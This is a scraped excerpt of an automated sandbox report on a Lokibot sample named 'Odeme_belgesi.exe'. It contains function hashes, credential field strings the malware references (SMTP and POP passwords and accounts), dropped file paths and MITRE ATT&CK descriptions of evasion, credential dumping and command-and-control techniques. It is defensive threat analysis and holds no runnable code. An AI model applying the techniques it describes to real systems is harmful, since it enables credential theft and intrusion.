Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpServer, xrefs: 0040D0DC
SmtpAccount, xrefs: 0040D0FA
PopAccount, xrefs: 0040D0B6
Technology, xrefs: 0040D08D
SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
PopPort, xrefs: 0040D0A7
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099
SmtpPort, xrefs: 0040D0EB

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Odeme_belgesi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Odeme_belgesi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Odeme_belgesi.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Odeme_belgesi.exe

Function 028ED310 Relevance: 6.4, Strings: 5, Instructions: 177
COMMON

Function 04FF67E0 Relevance: 2.7, Strings: 2, Instructions: 248
COMMON

Function 028EB980 Relevance: 2.7, Strings: 2, Instructions: 233
COMMON

Function 028E24EB Relevance: 2.7, Strings: 2, Instructions: 216
COMMON

Function 028EF590 Relevance: 2.7, Strings: 2, Instructions: 192
COMMON

Function 028E2548 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Function 04FF6888 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Function 028E2D89 Relevance: 2.6, Strings: 2, Instructions: 148
COMMON

Function 0A6EC658 Relevance: 1.9, APIs: 1, Instructions: 397
processCOMMON

Function 0A6EC64F Relevance: 1.9, APIs: 1, Instructions: 387
processCOMMON

Function 04FF87F8 Relevance: 1.7, Strings: 1, Instructions: 410
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre